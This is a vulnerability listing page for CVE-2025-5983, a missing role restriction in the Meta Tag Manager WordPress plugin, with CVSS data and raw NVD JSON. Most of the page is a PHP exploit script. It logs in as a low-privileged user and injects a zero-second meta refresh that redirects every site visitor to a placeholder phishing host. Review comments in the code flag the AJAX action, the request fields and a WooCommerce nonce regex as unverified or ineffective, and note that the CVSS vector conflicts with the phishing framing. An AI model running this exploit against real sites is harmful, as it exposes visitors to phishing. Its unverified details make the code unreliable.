Security Vulnerability Report
CVE-2025-5983 CVSS 6.5 MEDIUM

CVE-2025-5983

Published: 2025-10-22 06:15:32
Last Modified: 2026-04-15 00:35:42

Description

The Meta Tag Manager WordPress plugin before 3.3 does not restrict which roles can create http-equiv refresh meta tags.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Meta Tag Manager WordPress plugin < 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2025-5983 - Meta Tag Manager Plugin Exploit PoC
 * Vulnerability: Missing role restriction on http-equiv refresh meta tag creation
 * Affected: Meta Tag Manager < 3.3
 *
 * This PoC demonstrates how a low-privileged user can create
 * a malicious http-equiv refresh meta tag through the plugin's API.
 *
 * What the script does, as written: it reuses one cURL handle to (1) fetch the
 * login form, (2) POST credentials, (3) fetch the plugin's admin page and pull
 * a `_wpnonce` value out of the HTML, and (4) POST a meta tag definition to
 * admin-ajax.php. Hosts, account name and password are placeholders.
 *
 * NOTE(review): the AJAX action name and the request field layout in step 3
 * are not confirmed by the advisory text that accompanies this listing; treat
 * them as illustrative, not as a verified description of the plugin's interface.
 *
 * NOTE(review): the accompanying CVSS vector rates the issue as
 * availability-only (C:N/I:N/A:H), while this listing frames the outcome as a
 * redirect to a phishing page. The two descriptions should be reconciled
 * against the vendor/WPScan advisory before relying on either.
 *
 * Defender takeaways: the advisory gives 3.3 as the fixed version, so upgrading
 * is the remediation. On sites that ran an older version, review stored meta
 * tags for `http-equiv="refresh"` entries and check which account created them.
 */

// Target WordPress site (placeholder values)
$target_url = 'https://target-wordpress-site.com';
$username = 'low_priv_user'; // Subscriber or Author role
$password = 'user_password';

// Step 1: Authenticate to WordPress (obtain nonce and cookies)
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Cookies received on this handle are written to cookie.txt in the working directory.
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
// Return value is not checked: curl_exec() yields false on a transport error.
$login_page = curl_exec($ch);

// Extract login nonce
// NOTE(review): `woocommerce-login-nonce` is a WooCommerce form field, not
// something this script shows to be present on wp-login.php, and $nonce is
// never read again below, so this extraction has no effect on the requests.
preg_match('/name="woocommerce-login-nonce" value="([a-f0-9]+)"/', $login_page, $matches);
$nonce = $matches[1] ?? '';

// Submit login credentials (same handle, so the URL is still $login_url)
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to'=> $target_url . '/wp-admin/',
    'testcookie' => '1',
]));
// The login response is discarded; the script never verifies that authentication succeeded.
curl_exec($ch);

// Step 2: Get admin nonce for meta tag manager AJAX action
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=meta-tag-manager');
curl_setopt($ch, CURLOPT_POST, false);
$admin_page = curl_exec($ch);
// If the page is not served to this account, or carries no matching field,
// $wp_nonce silently falls back to an empty string and the script continues.
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $admin_page, $nonce_matches);
$wp_nonce = $nonce_matches[1] ?? '';

// Step 3: Submit malicious http-equiv refresh meta tag via AJAX
// NOTE(review): 'save_meta_tags' and the 'meta_tags' structure are unverified
// against the plugin; see the header note.
$malicious_payload = [
    'action' => 'save_meta_tags',
    '_wpnonce' => $wp_nonce,
    'meta_tags' => [
        [
            'http_equiv' => 'refresh',
            // A refresh directive with a zero-second delay and an external URL (placeholder host).
            'content' => '0;url=https://attacker-controlled-site.com/phishing',
        ]
    ],
];
curl_setopt($ch, CURLOPT_URL, $target_url . 
'/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($malicious_payload));
$response = curl_exec($ch);
curl_close($ch);

// Both messages are printed unconditionally: $response is echoed but never
// inspected, so the second line is a claim, not a confirmation that a tag
// was stored or that any visitor is affected.
echo "[*] Exploit completed. Response: " . $response . "\n";
echo "[*] All visitors will now be redirected to attacker-controlled URL\n";
?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-5983", "sourceIdentifier": "[email protected]", "published": "2025-10-22T06:15:32.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Meta Tag Manager WordPress plugin before 3.3 does not restrict which roles can create http-equiv refresh meta tags."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/4a2d4dcf-bb34-4eec-b5de-31c6a4d823cf/", "source": "[email protected]"}]}}